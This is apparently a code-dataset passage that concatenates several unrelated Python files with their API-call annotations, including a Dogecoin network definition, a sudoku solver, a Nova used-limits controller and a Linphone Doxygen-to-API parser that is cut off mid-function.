(['self', 'length'], {}), '(self, length)\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '"""Method Not Allowed"""', 's'], {}), "(http.NOT_ALLOWED, 'Method Not Allowed', s)\n", (11299, 11342), False, 'from twisted.web import resource\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), '(self)\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\n')]
from pycoin.networks.bitcoinish import create_bitcoinish_network network = create_bitcoinish_network( symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet", wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16", bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
[ "pycoin.networks.bitcoinish.create_bitcoinish_network" ]
[((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '"""DOGE"""', 'network_name': '"""Dogecoin"""', 'subnet_name': '"""mainnet"""', 'wif_prefix_hex': '"""9e"""', 'address_prefix_hex': '"""1e"""', 'pay_to_script_prefix_hex': '"""16"""', 'bip32_prv_prefix_hex': '"""<KEY>"""', 'bip32_pub_prefix_hex': '"""<KEY>"""'}), "(symbol='DOGE', network_name='Dogecoin',\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='<KEY>',\n bip32_pub_prefix_hex='<KEY>')\n", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\n')]
import logging from grpc_health.v1 import health_pb2, health_pb2_grpc from grpc_health.v1.health import HealthServicer from needlestack.apis import servicers_pb2_grpc from needlestack.servicers import factory from needlestack.servicers.merger import MergerServicer from examples import configs logging.getLogger("kazoo").setLevel("WARN") def main(): config = configs.LocalDockerConfig() server = factory.create_server(config) manager = factory.create_zookeeper_cluster_manager(config) manager.startup() servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server) health = HealthServicer() health_pb2_grpc.add_HealthServicer_to_server(health, server) health.set("Merger", health_pb2.HealthCheckResponse.SERVING) factory.serve(server) if __name__ == "__main__": main()
[ "examples.configs.LocalDockerConfig", "logging.getLogger", "needlestack.servicers.factory.create_zookeeper_cluster_manager", "needlestack.servicers.merger.MergerServicer", "grpc_health.v1.health.HealthServicer", "needlestack.servicers.factory.serve", "needlestack.servicers.factory.create_server", "grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server" ]
[((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\n', (394, 396), False, 'from examples import configs\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\n', (432, 440), False, 'from needlestack.servicers import factory\n'), ((455, 503), 'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\n', (495, 503), False, 'from needlestack.servicers import factory\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\n', (799, 807), False, 'from needlestack.servicers import factory\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', (['"""kazoo"""'], {}), "('kazoo')\n", (315, 324), False, 'import logging\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\n')]
from CGAL.CGAL_Kernel import Point_2 from CGAL.CGAL_Kernel import Weighted_point_2 from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2 from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2 from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3 lst = [] lst.append(Point_2(0, 0)) lst.append(Point_2(0, 4)) lst.append(Point_2(44, 0)) lst.append(Point_2(44, 5)) lst.append(Point_2(444, 51)) lst.append(Point_2(14, 1)) t = Alpha_shape_2(lst, 0, GENERAL) t2 = Alpha_shape_2(lst, 0) t.clear() t.make_alpha_shape(lst) for d in t.alpha(): print(d) for v in t.finite_vertices(): type = t.classify(v) print(v.get_range()[0]) if type == INTERIOR: print("INTERIOR") elif type == SINGULAR: print("SINGULAR") elif type == REGULAR: print("REGULAR") elif type == EXTERIOR: print("EXTERIOR") for f in t.finite_faces(): i = f.get_ranges(0) print(i.first) print(i.second) print(i.third) was = Weighted_alpha_shape_2() lst_wp = [] lst_wp.append(Weighted_point_2(Point_2(0, 0), 1)) lst_wp.append(Weighted_point_2(Point_2(0, 4), 1)) lst_wp.append(Weighted_point_2(Point_2(44, 0), 1)) lst_wp.append(Weighted_point_2(Point_2(44, 5), 1)) lst_wp.append(Weighted_point_2(Point_2(444, 51), 1)) lst_wp.append(Weighted_point_2(Point_2(14, 1), 1)) was.make_alpha_shape(lst_wp)
[ "CGAL.CGAL_Kernel.Point_2", "CGAL.CGAL_Alpha_shape_2.Alpha_shape_2", "CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2" ]
[((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (1519, 1528), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\n')]
import scene class MyScene(scene.Scene): def setup(self): self.label_node = scene.LabelNode('A', position=(100,400), parent=self) self.start_flag = False def update(self): if self.start_flag: x,y = self.label_node.position if x < 340: self.label_node.position = (x+2, y) else: self.start_flag = False def touch_ended(self, touch): self.start_flag = True scene.run(MyScene())
[ "scene.LabelNode" ]
[((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['"""A"""'], {'position': '(100, 400)', 'parent': 'self'}), "('A', position=(100, 400), parent=self)\n", (106, 145), False, 'import scene\n')]
from bot.commands import BaseCommand import mongo class DisconnectCommand(BaseCommand): _COMMAND = 'disconnect' _DESCRIPTION = 'Close currently active chat.' _SUCCESS_MESSAGE = 'Disconnected from chat' def _callback(self, user, _bot, update, **kwargs): return self._call(user, _bot, update, **kwargs) def _call(self, user, _bot, update, **kwargs): chat = mongo.chats.get_active_chat_by_telegram_id(user.id) if chat: mongo.chats.disable_chat(chat['_id']) return True _bot.send_message( user.id, 'You are not connected to any vk user', ) return False
[ "mongo.chats.get_active_chat_by_telegram_id", "mongo.chats.disable_chat" ]
[((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\n', (439, 448), False, 'import mongo\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', (["chat['_id']"], {}), "(chat['_id'])\n", (502, 515), False, 'import mongo\n')]
import numpy as np board = np.zeros(shape=(9, 9)) count = 0 def solve(): global count count += 1 if count % 1000 == 0: print('\rCurrent number of computations made:', count, end='') freePos = find() if freePos is None: return True i = freePos[0] j = freePos[1] for w in range(1, 10): if possible(w, freePos): board[i][j] = w if solve(): return True board[i][j] = 0 return False def find(): for i in range(9): for j in range(9): if board[i][j] == 0: return [i, j] return None def possible(value, position): # position = (i, j) tuple i = position[0] j = position[1] # checks row and column for repeat value if (value in board[:, j]) or (value in board[i]): return False # reset to i,j - top left square i = (i // 3) * 3 j = (j // 3) * 3 # check all squares in square for n in range(i, i + 3): for m in range(j, j + 3): if board[n][m] == value: return False return True def change(position): # position = (i, j) tuple i = position[0] j = position[1] for w in range(1, 10): if w not in board[:, j] and w not in board[i]: board[i][j] = w return True return False def initialize(): print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank") integerChunk = input("Numbers: ") pos = 0 for i in range(9): for j in range(9): board[i][j] = int(integerChunk[pos]) pos += 1 def displayBoard(): for i in range(3): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(3, 6): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(6, 9): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") def main(): initialize() print("Is this the correct board? Press enter to continue or 'q' to exit program.") displayBoard() response = input() if response == "q": exit() print("---------------SOLVING---------------\n") solve() print("\r\rSOLUTION") displayBoard() print("\nTotal number of computations:", count) if __name__ == "__main__": main()
[ "numpy.zeros" ]
[((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\n', (36, 50), True, 'import numpy as np\n')]
# Copyright 2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import api_version_request from nova.api.openstack.api_version_request \ import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION from nova.api.openstack import extensions from nova.api.openstack import wsgi from nova.policies import used_limits as ul_policies from nova import quota QUOTAS = quota.QUOTAS class UsedLimitsController(wsgi.Controller): @staticmethod def _reserved(req): try: return int(req.GET['reserved']) except (ValueError, KeyError): return False @wsgi.extends @extensions.expected_errors(()) def index(self, req, resp_obj): context = req.environ['nova.context'] project_id = self._project_id(context, req) quotas = QUOTAS.get_project_quotas(context, project_id, usages=True) if api_version_request.is_supported( req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION): quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalServerGroupsUsed': 'server_groups', } else: quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalFloatingIpsUsed': 'floating_ips', 'totalSecurityGroupsUsed': 'security_groups', 'totalServerGroupsUsed': 'server_groups', } used_limits = {} for display_name, key in quota_map.items(): if key in quotas: reserved = (quotas[key]['reserved'] if self._reserved(req) else 0) used_limits[display_name] = quotas[key]['in_use'] + reserved resp_obj.obj['limits']['absolute'].update(used_limits) def _project_id(self, context, req): if 'tenant_id' in req.GET: tenant_id = req.GET.get('tenant_id') target = { 'project_id': tenant_id, 'user_id': context.user_id } context.can(ul_policies.BASE_POLICY_NAME, target) return tenant_id return context.project_id
[ "nova.api.openstack.extensions.expected_errors", "nova.api.openstack.api_version_request.is_supported" ]
[((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\n', (1199, 1203), False, 'from nova.api.openstack import extensions\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\n')]
#!/usr/bin/python # Copyright (C) 2014 Belledonne Communications SARL # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import argparse import os import six import string import sys import xml.etree.ElementTree as ET import xml.dom.minidom as minidom import metadoc class CObject: def __init__(self, name): self.name = name.strip() self.briefDescription = '' self.detailedDescription = None self.deprecated = False self.briefDoc = None class CEnumValue(CObject): def __init__(self, name): CObject.__init__(self, name) self.value = None class CEnum(CObject): def __init__(self, name): CObject.__init__(self, name) self.values = [] self.associatedTypedef = None def addValue(self, value): self.values.append(value) class CStructMember(CObject): def __init__(self, name, t): CObject.__init__(self, name) self.ctype = t.strip() class CStruct(CObject): def __init__(self, name): CObject.__init__(self, name) self.members = [] self.associatedTypedef = None def addMember(self, member): self.members.append(member) class CTypedef(CObject): def __init__(self, name, definition): CObject.__init__(self, name) self.definition = definition.strip() class CArgument(CObject): def __init__(self, t, name = '', enums = [], structs = []): CObject.__init__(self, name) self.description = None self.containedType = None keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ] fullySplittedType = [] splittedType = t.strip().split(' ') for s in splittedType: if s.startswith('*'): fullySplittedType.append('*') if len(s) > 1: fullySplittedType.append(s[1:]) elif s.endswith('*'): fullySplittedType.append(s[:-1]) fullySplittedType.append('*') else: fullySplittedType.append(s) if 'MS2_DEPRECATED' in fullySplittedType: fullySplittedType.remove('MS2_DEPRECATED') elif 'LINPHONE_DEPRECATED' in fullySplittedType: fullySplittedType.remove('LINPHONE_DEPRECATED') isStruct = False isEnum = False self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short' for s in fullySplittedType: if not s in keywords: self.ctype = s if s == 'struct': isStruct = True if s == 'enum': isEnum = True if isStruct: for st in structs: if st.associatedTypedef is not None: self.ctype = st.associatedTypedef.name elif isEnum: for e in enums: if e.associatedTypedef is not None: self.ctype = e.associatedTypedef.name if self.ctype == 'int' and 'int' not in fullySplittedType: if fullySplittedType[-1] == '*': fullySplittedType.insert(-1, 'int') else: fullySplittedType.append('int') self.completeType = ' '.join(fullySplittedType) def __str__(self): return self.completeType + " " + self.name class CArgumentsList: def __init__(self): self.arguments = [] def addArgument(self, arg): self.arguments.append(arg) def __len__(self): return len(self.arguments) def __getitem__(self, key): return self.arguments[key] def __str__(self): argstr = [] for arg in self.arguments: argstr.append(str(arg)) return ', '.join(argstr) class CFunction(CObject): def __init__(self, name, returnarg, argslist): CObject.__init__(self, name) self.returnArgument = returnarg self.arguments = argslist self.location = None class CEvent(CFunction): pass class CProperty: def __init__(self, name): self.name = name self.getter = None self.setter = None class CClass(CObject): def __init__(self, st): CObject.__init__(self, st.associatedTypedef.name) if st.deprecated or st.associatedTypedef.deprecated: self.deprecated = True if len(st.associatedTypedef.briefDescription) > 0: self.briefDescription = st.associatedTypedef.briefDescription elif len(st.briefDescription) > 0: self.briefDescription = st.briefDescription if st.associatedTypedef.detailedDescription is not None: self.detailedDescription = st.associatedTypedef.detailedDescription elif st.detailedDescription is not None: self.detailedDescription = st.detailedDescription self.__struct = st self.events = {} self.classMethods = {} self.instanceMethods = {} self.properties = {} self.__computeCFunctionPrefix() def __computeCFunctionPrefix(self): self.cFunctionPrefix = '' first = True for l in self.name: if l.isupper() and not first: self.cFunctionPrefix += '_' self.cFunctionPrefix += l.lower() first = False self.cFunctionPrefix += '_' def __addPropertyGetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].getter = f def __addPropertySetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].setter = f def __addClassMethod(self, f): if not f.name in self.classMethods: self.classMethods[f.name] = f def __addInstanceMethod(self, f): name = f.name[len(self.cFunctionPrefix):] if name.startswith('get_') and len(f.arguments) == 1: self.__addPropertyGetter(name[4:], f) elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.startswith('set_') and len(f.arguments) == 2: self.__addPropertySetter(name[4:], f) elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t': self.__addPropertySetter(name[7:] + '_enabled', f) else: if not f.name in self.instanceMethods: self.instanceMethods[f.name] = f def addEvent(self, ev): if not ev.name in self.events: self.events[ev.name] = ev def addMethod(self, f): if len(f.arguments) > 0 and f.arguments[0].ctype == self.name: self.__addInstanceMethod(f) else: self.__addClassMethod(f) class Project: def __init__(self): self.verbose = False self.prettyPrint = False self.enums = [] self.__structs = [] self.__typedefs = [] self.__events = [] self.__functions = [] self.classes = [] self.docparser = metadoc.Parser() def add(self, elem): if isinstance(elem, CClass): if self.verbose: print("Adding class " + elem.name) self.classes.append(elem) elif isinstance(elem, CEnum): if self.verbose: print("Adding enum " + elem.name) for ev in elem.values: print("\t" + ev.name) self.enums.append(elem) elif isinstance(elem, CStruct): if self.verbose: print("Adding struct " + elem.name) for sm in elem.members: print("\t" + sm.ctype + " " + sm.name) self.__structs.append(elem) elif isinstance(elem, CTypedef): if self.verbose: print("Adding typedef " + elem.name) print("\t" + elem.definition) self.__typedefs.append(elem) elif isinstance(elem, CEvent): if self.verbose: print("Adding event " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__events.append(elem) elif isinstance(elem, CFunction): if self.verbose: print("Adding function " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__functions.append(elem) def __cleanDescription(self, descriptionNode): for para in descriptionNode.findall('./para'): for n in para.findall('./parameterlist'): para.remove(n) for n in para.findall("./simplesect[@kind='return']"): para.remove(n) for n in para.findall("./simplesect[@kind='see']"): t = ''.join(n.itertext()) n.clear() n.tag = 'see' n.text = t for n in para.findall("./simplesect[@kind='note']"): n.tag = 'note' n.attrib = {} for n in para.findall(".//xrefsect"): para.remove(n) for n in para.findall('.//ref'): n.attrib = {} for n in para.findall(".//bctbx_list"): para.remove(n) if descriptionNode.tag == 'parameterdescription': descriptionNode.tag = 'description' if descriptionNode.tag == 'simplesect': descriptionNode.tag = 'description' descriptionNode.attrib = {} return descriptionNode def __canBeWrapped(self, node): return node.find('./detaileddescription//donotwrap') is None def __discoverClasses(self): for td in self.__typedefs: if td.definition.startswith('enum '): for e in self.enums: if (e.associatedTypedef is None) and td.definition[5:] == e.name: e.associatedTypedef = td break elif td.definition.startswith('struct '): structFound = False for st in self.__structs: if (st.associatedTypedef is None) and td.definition[7:] == st.name: st.associatedTypedef = td structFound = True break if not structFound: name = td.definition[7:] print("Structure with no associated typedef: " + name) st = CStruct(name) st.associatedTypedef = td self.add(st) for td in self.__typedefs: if td.definition.startswith('struct '): for st in self.__structs: if st.associatedTypedef == td: cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(cclass) break elif ('Linphone' + td.definition) == td.name: st = CStruct(td.name) st.associatedTypedef = td cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(st) self.add(cclass) # Sort classes by length of name (longest first), so that methods are put in the right class self.classes.sort(key = lambda c: len(c.name), reverse = True) for e in self.__events: eventAdded = False for c in self.classes: if c.name.endswith('Cbs') and e.name.startswith(c.name): c.addEvent(e) eventAdded = True break if not eventAdded: for c in self.classes: if e.name.startswith(c.name): c.addEvent(e) eventAdded = True break for f in self.__functions: for c in self.classes: if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]: c.addMethod(f) break def __parseCEnumValueInitializer(self, initializer): initializer = initializer.strip() if not initializer.startswith('='): return None initializer = initializer[1:] initializer.strip() return initializer def __parseCEnumValue(self, node): ev = CEnumValue(node.find('./name').text) initializerNode = node.find('./initializer') if initializerNode is not None: ev.value = self.__parseCEnumValueInitializer(initializerNode.text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: ev.deprecated = True ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return ev def __parseCEnumMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None e = CEnum(node.find('./name').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: e.deprecated = True e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() e.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) enumvalues = node.findall("enumvalue[@prot='public']") for enumvalue in enumvalues: ev = self.__parseCEnumValue(enumvalue) e.addValue(ev) return e def __findCEnum(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']") for m in memberdefs: e = self.__parseCEnumMemberdef(m) self.add(e) def __parseCStructMember(self, node, structname): name = node.find('./name').text definition = node.find('./definition').text t = definition[0:definition.find(structname + "::" + name)] sm = CStructMember(name, t) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: sm.deprecated = True sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return sm def __parseCStructCompounddef(self, node): s = CStruct(node.find('./compoundname').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: s.deprecated = True s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() s.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']") for structmember in structmembers: sm = self.__parseCStructMember(structmember, s.name) s.addMember(sm) return s def __findCStruct(self, tree): compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']") for c in compounddefs: s = self.__parseCStructCompounddef(c) self.add(s) def __parseCTypedefMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None name = node.find('./name').text definition = node.find('./definition').text if definition.startswith('typedef '): definition = definition[8 :] if name.endswith('Cb'): pos = definition.find("(*") if pos == -1: return None returntype = definition[0:pos].strip() returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" definition = definition[pos + 2 :] pos = definition.find("(") definition = definition[pos + 1 : -1] argslist = CArgumentsList() for argdef in definition.split(', '): argType = '' starPos = argdef.rfind('*') spacePos = argdef.rfind(' ') if starPos != -1: argType = argdef[0 : starPos + 1] argName = argdef[starPos + 1 :] elif spacePos != -1: argType = argdef[0 : spacePos] argName = argdef[spacePos + 1 :] argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) f = CEvent(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return f else: pos = definition.rfind(" " + name) if pos != -1: definition = definition[0 : pos] td = CTypedef(name, definition) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: td.deprecated = True td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() td.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return td return None def __findCTypedef(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']") for m in memberdefs: td = self.__parseCTypedefMemberdef(m) self.add(td) def __parseCFunctionMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None internal = node.find("./detaileddescription/internal") if internal is not None: return None missingDocWarning = '' name = node.find('./name').text t = ''.join(node.find('./type').itertext()) returnarg = CArgument(t, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" argslist = CArgumentsList() argslistNode = node.findall('./param') 